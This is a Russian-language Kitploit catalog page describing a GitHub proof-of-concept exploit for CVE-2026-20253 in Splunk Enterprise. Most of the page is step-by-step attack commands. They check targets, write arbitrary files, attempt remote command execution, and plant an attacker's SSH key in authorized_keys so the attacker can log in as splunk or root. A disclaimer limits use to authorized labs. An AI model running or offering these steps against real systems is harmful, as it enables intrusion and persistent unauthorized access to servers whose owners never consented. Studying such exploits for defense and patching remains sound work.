Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2026-20253 — CVE-2026-20253 - Splunk Enterprise | Kitploit
Инструменты/GitHubGitHub/horkimhab/cve-2026-20253
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingLearning & EducationRemote Access Tool
GitHubhorkimhab/cve-2026-20253

CVE-2026-20253

CVE-2026-20253 - Splunk Enterprise

Репозиторий
2 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2026-20253 — Splunk Enterprise

⚡ Простое использование

Используйте этот проект только в безопасных и авторизованных средах, таких как:

  • Локальные виртуальные машины
  • Docker-контейнеры
  • Изолированные лабораторные стенды
  • Авторизованные среды тестирования на проникновение

Пример настройки:

root@kitploit:~
git clone https://github.com/HORKimhab/CVE-2026-20253
cd CVE-2026-20253

# Проект использует Python, действуйте следующим образом

# Создайте виртуальное окружение
python -m venv venv

# Активируйте виртуальное окружение

# macOS / Linux
source venv/bin/activate

# Windows (Git Bash / WSL)
source venv/Scripts/activate

# Установите зависимости
pip install -r requirements.txt

Пример использования:

root@kitploit:~
# Базовая проверка
python3 cve-2026-20253.py -t http://target:8000 --check

# Запись пустого/усечённого файла
python3 cve-2026-20253.py -t http://target:8000 --write "/tmp/pwned"

# Запись с содержимым из файла
python3 cve-2026-20253.py -t http://target:8000 --write "/tmp/shell.py" --content poc-content.txt

# Расширенный режим (восстановление + содержимое)
python3 cve-2026-20253.py -t http://target:8000 --write "/opt/splunk/etc/apps/.../payload.py" --content poc-content.txt --restore

# Попытка удалённого выполнения команд (RCE)
python3 cve-2026-20253.py -t http://target:8000 --rce

python3 cve-2026-20253_poc.py -t http://target:8000 \
  --write "/path/to/target/file.py" \
  --content poc-content.txt --restore


# SSH 

# Создайте пару SSH-ключей (если у вас её нет)
ssh-keygen -t ed25519 -C "poc@attacker" -f ~/.ssh/splunk_poc_key -N ""

# Или используйте RSA, если целевая система старая
# ssh-keygen -t rsa -b 4096 -f ~/.ssh/splunk_poc_key -N ""

cat ~/.ssh/splunk_poc_key.pub > poc-content.txt

python3 cve-2026-20253_poc.py -t http://target:8000 \
  --write "/home/splunk/.ssh/authorized_keys" \
  --content poc-content.txt \
  --restore

python3 cve-2026-20253_poc.py -t http://target:8000 \
  --write "/home/splunk/.ssh/authorized_keys" \
  --content poc-content.txt

# Убедитесь, что права доступа настроены правильно на вашей стороне
chmod 600 ~/.ssh/splunk_poc_key

# Подключение
ssh -i ~/.ssh/splunk_poc_key splunk@target_ip

# Или от root
ssh -i ~/.ssh/splunk_poc_key root@target_ip


# Шаг 1: Создание каталога (может сработать не всегда)
python3 cve-2026-20253_poc.py -t http://target:8000 --write "/home/splunk/.ssh/.placeholder"

# Шаг 2: Запись authorized_keys
python3 cve-2026-20253_poc.py -t http://target:8000 --write "/home/splunk/.ssh/authorized_keys" --content poc-content.txt

mkdir -p /home/splunk/.ssh
chmod 700 /home/splunk/.ssh
chmod 600 /home/splunk/.ssh/authorized_keys
chown -R splunk:splunk /home/splunk/.ssh

Благодарность или ссылки

  • https://thehackernews.com/2026/06/critical-splunk-enterprise-flaw-lets.html
  • watchTowr-vs-Splunk-CVE-2026-20253: https://github.com/watchtowrlabs/watchTowr-vs-Splunk-CVE-2026-20253
  • CVE-2026-20253-0xBlackash: https://github.com/0xBlackash/CVE-2026-20253

📚 Образовательный репозиторий для исследований в области безопасности

Репозиторий для изучения, тестирования и исследования концепций кибербезопасности в контролируемых средах.


⚠️ Отказ от ответственности (юридический и по безопасности)

Цель

Этот репозиторий предназначен исключительно для образовательных и авторизованных исследований в области безопасности.

Он создан, чтобы помочь пользователям изучить:

  • Уязвимости безопасности
  • Концепции sandbox и изоляции
  • Безопасное программирование и защитные практики

Только авторизованное использование

Используйте этот репозиторий только в средах, где у вас есть разрешение, например:

  • Личные лаборатории или виртуальные машины
  • Docker или изолированные среды
  • Авторизованное тестирование на проникновение
  • Обучение кибербезопасности или академические исследования

Несанкционированное или незаконное использование строго запрещено.


Отсутствие ответственности

Автор и соавторы не несут ответственности за любой ущерб, неправомерное использование, юридические проблемы или убытки, вызванные этим проектом.

Используя этот репозиторий, вы соглашаетесь с тем, что:

  • Вы несёте ответственность за свои действия
  • Вы будете использовать его законно и этично
  • Проект предоставляется без каких-либо гарантий

Этичное использование

Этот проект предназначен для:

  • Защитных исследований в области безопасности
  • Образования в области кибербезопасности
  • Повышения осведомлённости об уязвимостях
  • Исследований безопасных систем и программного обеспечения

Пожалуйста, следуйте практикам ответственного раскрытия информации и соблюдайте все применимые законы.


Контакты

Для ответственного раскрытия информации или сотрудничества свяжитесь с мейнтейнером репозитория через GitHub.

Скачать инструмент